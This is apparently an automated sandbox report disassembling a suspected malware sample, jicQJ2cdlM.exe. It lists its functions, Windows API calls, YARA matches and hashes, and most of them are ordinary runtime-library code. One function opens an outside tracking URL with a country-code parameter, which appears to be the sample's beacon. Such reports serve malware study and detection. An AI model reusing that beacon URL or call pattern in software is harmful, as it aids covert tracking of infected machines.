                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 009E5141
                                                                                    • __Getcoll.LIBCPMT ref: 009E5150
                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 009E5160
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$GetcollH_prolog3_
                                                                                    • String ID:
                                                                                    • API String ID: 1844465188-0
                                                                                    • Opcode ID: bdce9d8e1be77268be16da58274f9ad6a83026367902608090edaa3f01144fdf
                                                                                    • Instruction ID: 260a0715103ba0388b67b4daceeeef547125e005e6a3f54f4ff4ae9bb31ba0db
                                                                                    • Opcode Fuzzy Hash: bdce9d8e1be77268be16da58274f9ad6a83026367902608090edaa3f01144fdf
                                                                                    • Instruction Fuzzy Hash: 1221C2B1804348EFDB02EFA1C841BDDBBB4FF80311F408419E095AB282DBB49E45CB91
                                                                                    Function 00431F7E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,?,0042EAEE,00434D9C,?,00431F28,00000001,00000364,?,0042E005,00457910,00000010), ref: 00431F83
                                                                                    • _free.LIBCMT ref: 00431FB8
                                                                                    • _free.LIBCMT ref: 00431FDF
                                                                                    • SetLastError.KERNEL32(00000000), ref: 00431FEC
                                                                                    • SetLastError.KERNEL32(00000000), ref: 00431FF5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free
                                                                                    • String ID:
                                                                                    • API String ID: 3170660625-0
                                                                                    • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                    • Instruction ID: 1e3cd072d0496c43a3242b2b2daca3b64790c0c87830b362050c04c7c8c4abe4
                                                                                    • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                    • Instruction Fuzzy Hash: 2101F936149A007BD61227255C45D6B262DABD977AF20212FF815933E2EFAD8906412D
                                                                                    Function 00A121E5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(009EDAFC,009EDAFC,00000002,00A0ED55,00A13971,00000000,?,00A06A25,00000002,00000000,00000000,00000000,?,009ECFAD,009EDAFC,00000004), ref: 00A121EA
                                                                                    • _free.LIBCMT ref: 00A1221F
                                                                                    • _free.LIBCMT ref: 00A12246
                                                                                    • SetLastError.KERNEL32(00000000,?,009EDAFC), ref: 00A12253
                                                                                    • SetLastError.KERNEL32(00000000,?,009EDAFC), ref: 00A1225C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free
                                                                                    • String ID:
                                                                                    • API String ID: 3170660625-0
                                                                                    • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                    • Instruction ID: 2ffc24a5d2636de54913d036eaebd7f0b476648f96da71cd8503c3a41b757217
                                                                                    • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                    • Instruction Fuzzy Hash: 6D01F936505B007B861627345D86FEF226DEFD6BB2B200538F51593292FE70CDA28229
                                                                                    Function 00431EFA Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                    • _free.LIBCMT ref: 00431F31
                                                                                    • _free.LIBCMT ref: 00431F59
                                                                                    • SetLastError.KERNEL32(00000000), ref: 00431F66
                                                                                    • SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free
                                                                                    • String ID:
                                                                                    • API String ID: 3170660625-0
                                                                                    • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                    • Instruction ID: 89f26f5adfa52999dd97e159cd61ed3cb5fd8874f2961931db20f525c950a72a
                                                                                    • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                    • Instruction Fuzzy Hash: 0AF02D3A50CA0037D61637356C06B5F26199FD9B67F30212FF814923F2EF6D8806412D
                                                                                    Function 00A12161 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,00A0AA0C,?,00000000,?,00A0CE06,009E249A,00000000,?,00451F20), ref: 00A12165
                                                                                    • _free.LIBCMT ref: 00A12198
                                                                                    • _free.LIBCMT ref: 00A121C0
                                                                                    • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A121CD
                                                                                    • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A121D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free
                                                                                    • String ID:
                                                                                    • API String ID: 3170660625-0
                                                                                    • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                    • Instruction ID: 3737075b4cafc427696373345e1fcc387726733bde453276a83227db2e16c274
                                                                                    • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                    • Instruction Fuzzy Hash: CCF0CD36544B00B7C6117734AD0ABDF26699FC2BA2F250624FE28D72D1EE61C9E24329
                                                                                    Function 00417940 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0041275D: TlsGetValue.KERNEL32(?,?,00410B7B,00412C88,00000000,?,00410B59,?,?,?,00000000,?,00000000), ref: 00412763
                                                                                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041796A
                                                                                      • Part of subcall function 00420FD3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FFA
                                                                                      • Part of subcall function 00420FD3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00421013
                                                                                      • Part of subcall function 00420FD3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421089
                                                                                      • Part of subcall function 00420FD3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421091
                                                                                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417978
                                                                                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417982
                                                                                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041798C
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004179AA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                    • String ID:
                                                                                    • API String ID: 4266703842-0
                                                                                    • Opcode ID: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                                                    • Instruction ID: 8cd570ce40639c9f8c017ae24bf7a6ba5e4898ad5d78eaa9f9672d2de087314b
                                                                                    • Opcode Fuzzy Hash: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                                                    • Instruction Fuzzy Hash: 0BF04671A0422867CE15B7229812AEEB72A9F90718F40012FF41093283DF6C9E9986CD
                                                                                    Function 009F7BA7 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 009F29C4: TlsGetValue.KERNEL32(?,?,009F0DE2,009F2EEF,00000000,?,009F0DC0,?,?,?,00000000,?,00000000), ref: 009F29CA
                                                                                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 009F7BD1
                                                                                      • Part of subcall function 00A0123A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00A01261
                                                                                      • Part of subcall function 00A0123A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00A0127A
                                                                                      • Part of subcall function 00A0123A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00A012F0
                                                                                      • Part of subcall function 00A0123A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00A012F8
                                                                                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 009F7BDF
                                                                                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 009F7BE9
                                                                                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 009F7BF3
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009F7C11
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                    • String ID:
                                                                                    • API String ID: 4266703842-0
                                                                                    • Opcode ID: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                                                    • Instruction ID: b60f9e6044826ab390dde52f5b5a097f04c35fdf3e001897d622d6d072f9840b
                                                                                    • Opcode Fuzzy Hash: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                                                    • Instruction Fuzzy Hash: B6F02B35A0011C67CF16F775D812B7EF72A9FC1710B05412AF64193282DF759E4687C5
                                                                                    Function 00439E65 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00439E7D
                                                                                      • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                                                      • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                                                    • _free.LIBCMT ref: 00439E8F
                                                                                    • _free.LIBCMT ref: 00439EA1
                                                                                    • _free.LIBCMT ref: 00439EB3
                                                                                    • _free.LIBCMT ref: 00439EC5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                    • Instruction ID: 3df159f09b4f07c7f9cd4576f3114e9092ca915295917fe09ca5bd5d66e4921a
                                                                                    • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                    • Instruction Fuzzy Hash: 61F04F32409200ABC620EB59E483C1773D9BB08712F686A4FF04CDB751CBBAFC808A5D
                                                                                    Function 00A1A0CC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00A1A0E4
                                                                                      • Part of subcall function 00A136F1: HeapFree.KERNEL32(00000000,00000000,?,00A1A37F,?,00000000,?,00000000,?,00A1A623,?,00000007,?,?,00A1AA17,?), ref: 00A13707
                                                                                      • Part of subcall function 00A136F1: GetLastError.KERNEL32(?,?,00A1A37F,?,00000000,?,00000000,?,00A1A623,?,00000007,?,?,00A1AA17,?,?), ref: 00A13719
                                                                                    • _free.LIBCMT ref: 00A1A0F6
                                                                                    • _free.LIBCMT ref: 00A1A108
                                                                                    • _free.LIBCMT ref: 00A1A11A
                                                                                    • _free.LIBCMT ref: 00A1A12C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                    • Instruction ID: 7e3976c7b333a0b02ed6d410f25bb59ddf828532437b20ba9abdc3af23596686
                                                                                    • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                    • Instruction Fuzzy Hash: 23F04F33506200BB8A20EF58E9C3C9A73DDAA153A1B640E05F018DB711CF31FCD08A5A
                                                                                    Function 0043174A Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00431768
                                                                                      • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                                                      • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                                                    • _free.LIBCMT ref: 0043177A
                                                                                    • _free.LIBCMT ref: 0043178D
                                                                                    • _free.LIBCMT ref: 0043179E
                                                                                    • _free.LIBCMT ref: 004317AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                    • Instruction ID: 59d86e5f81b59af28f084099f89460b905b5d9e26065712495255f22da63edd4
                                                                                    • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                    • Instruction Fuzzy Hash: 01F03070C003109B9A226F25AC414553B60AF2D727F04636FF4069B273C77ADA52DF8E
                                                                                    Function 0041CCE5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCEF
                                                                                    • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD20
                                                                                    • GetCurrentThread.KERNEL32 ref: 0041CD29
                                                                                    • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD3C
                                                                                    • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD45
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                    • String ID:
                                                                                    • API String ID: 2583373041-0
                                                                                    • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                    • Instruction ID: c40835f97e64ecf2e035c3ed6e644cfe8c904edaac08ffe142c14ca74381b7ad
                                                                                    • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                    • Instruction Fuzzy Hash: 81F0AE762406109B8625FF11FD518F777759FC4715300051FE44B47551CF28A9C1D7A6
                                                                                    Function 00A119B1 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00A119CF
                                                                                      • Part of subcall function 00A136F1: HeapFree.KERNEL32(00000000,00000000,?,00A1A37F,?,00000000,?,00000000,?,00A1A623,?,00000007,?,?,00A1AA17,?), ref: 00A13707
                                                                                      • Part of subcall function 00A136F1: GetLastError.KERNEL32(?,?,00A1A37F,?,00000000,?,00000000,?,00A1A623,?,00000007,?,?,00A1AA17,?,?), ref: 00A13719
                                                                                    • _free.LIBCMT ref: 00A119E1
                                                                                    • _free.LIBCMT ref: 00A119F4
                                                                                    • _free.LIBCMT ref: 00A11A05
                                                                                    • _free.LIBCMT ref: 00A11A16
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                    • Instruction ID: 2cd1686f3f36f4323c875228628474037464e34c00b50b7d69f1795a295f85b7
                                                                                    • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                    • Instruction Fuzzy Hash: 7EF03071C00311AB8E216F14AD924493B64AF1A7627000666F4229B373CB74D9E2DB8E
                                                                                    Function 009FCF4C Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 009FCF56
                                                                                    • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 009FCF87
                                                                                    • GetCurrentThread.KERNEL32 ref: 009FCF90
                                                                                    • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 009FCFA3
                                                                                    • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 009FCFAC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                    • String ID:
                                                                                    • API String ID: 2583373041-0
                                                                                    • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                    • Instruction ID: 42164d66af501640ed6bf8d949e0b4b8f8dbbe7e22a790f12105f0c4fe6c69c2
                                                                                    • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                    • Instruction Fuzzy Hash: 27F0A0362009089B8A25EF61FA50DBBB7BBAFC4711310854CF68706652CF25AA42EB31
                                                                                    Function 009E2E8B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 009E2EAE
                                                                                      • Part of subcall function 009E1321: _wcslen.LIBCMT ref: 009E1328
                                                                                      • Part of subcall function 009E1321: _wcslen.LIBCMT ref: 009E1344
                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 009E30C6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InternetOpen_wcslen
                                                                                    • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                                                    • API String ID: 3381584094-4083784958
                                                                                    • Opcode ID: f722d498d47d2f0aeabff3c67fdeace8084b2a701aad829f7b28d117417d8525
                                                                                    • Instruction ID: 372b866b8966085bdf93468711da0ca021e4fa75951f2537d9e5a777c14a08ce
                                                                                    • Opcode Fuzzy Hash: f722d498d47d2f0aeabff3c67fdeace8084b2a701aad829f7b28d117417d8525
                                                                                    • Instruction Fuzzy Hash: 3A518395A65344A8E320EFB0BC52B353378EF58752F10643BE518CB2B2E7B18E40875E
                                                                                    Function 0042F738 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\jicQJ2cdlM.exe,00000104), ref: 0042F773
                                                                                    • _free.LIBCMT ref: 0042F83E
                                                                                    • _free.LIBCMT ref: 0042F848
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$FileModuleName
                                                                                    • String ID: C:\Users\user\Desktop\jicQJ2cdlM.exe
                                                                                    • API String ID: 2506810119-2409927387
                                                                                    • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                    • Instruction ID: 2f2bce9173a2d2ca0187e045b48802aae097e8e7c4f0e2c97b909a8c245fc2df
                                                                                    • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                    • Instruction Fuzzy Hash: 47319371B00228ABDB21EF99AC8189FBBFCEF95314B90407BE80497211D7749E45CB59
                                                                                    Function 00A0F99F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\jicQJ2cdlM.exe,00000104), ref: 00A0F9DA
                                                                                    • _free.LIBCMT ref: 00A0FAA5
                                                                                    • _free.LIBCMT ref: 00A0FAAF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$FileModuleName
                                                                                    • String ID: C:\Users\user\Desktop\jicQJ2cdlM.exe
                                                                                    • API String ID: 2506810119-2409927387
                                                                                    • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                    • Instruction ID: 9fa44c5dd0583763b6263a9e07ea62197506b2b9ed878ec6886078f62a0d8e3f
                                                                                    • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                    • Instruction Fuzzy Hash: 33316071A0025CEFDB31DF99AD8199EBBFCEF99750B104076F809A7291D6709E44CB90
                                                                                    Function 00A03044 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 00A03071
                                                                                      • Part of subcall function 009F8AD2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 009F8ADD
                                                                                    • SafeSQueue.LIBCONCRT ref: 00A0308A
                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 00A0314A
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A0316B
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00A03179
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                                                    • String ID: 11@
                                                                                    • API String ID: 3496964030-1785270423
                                                                                    • Opcode ID: f5b94dce39a4837ba2e296382e939281c1cc6f51ac582c5d2e9b37c10b4daf25
                                                                                    • Instruction ID: b6355da4cfc988b32b6637978764f9134dad3ea6af089a4917bf4a3e1c95cdf0
                                                                                    • Opcode Fuzzy Hash: f5b94dce39a4837ba2e296382e939281c1cc6f51ac582c5d2e9b37c10b4daf25
                                                                                    • Instruction Fuzzy Hash: 432104367006098FCF15AF28D890BBA7BA5EF84310F044199ED068B397CB70ED05CB91
                                                                                    Function 00A09053 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00A121E4), ref: 00A0E220
                                                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00A121E4), ref: 00A0E25A
                                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 00A0E261
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorExitFeatureLastPresentProcessorThreadUser
                                                                                    • String ID: 11@
                                                                                    • API String ID: 1079102050-1785270423
                                                                                    • Opcode ID: 8b5411bbe6c94bee456d29a8542aa325eb684c89ca07275a9873d682f3d1ed15
                                                                                    • Instruction ID: 90d312bf4035326088b14cff4cd56557bc9508686e8b789c4fd0d0bad9ee9d57
                                                                                    • Opcode Fuzzy Hash: 8b5411bbe6c94bee456d29a8542aa325eb684c89ca07275a9873d682f3d1ed15
                                                                                    • Instruction Fuzzy Hash: 1B113A34640309AAEF04BB70BE0BBED3768AF59B04F100968F9006B1D3DBB199809661
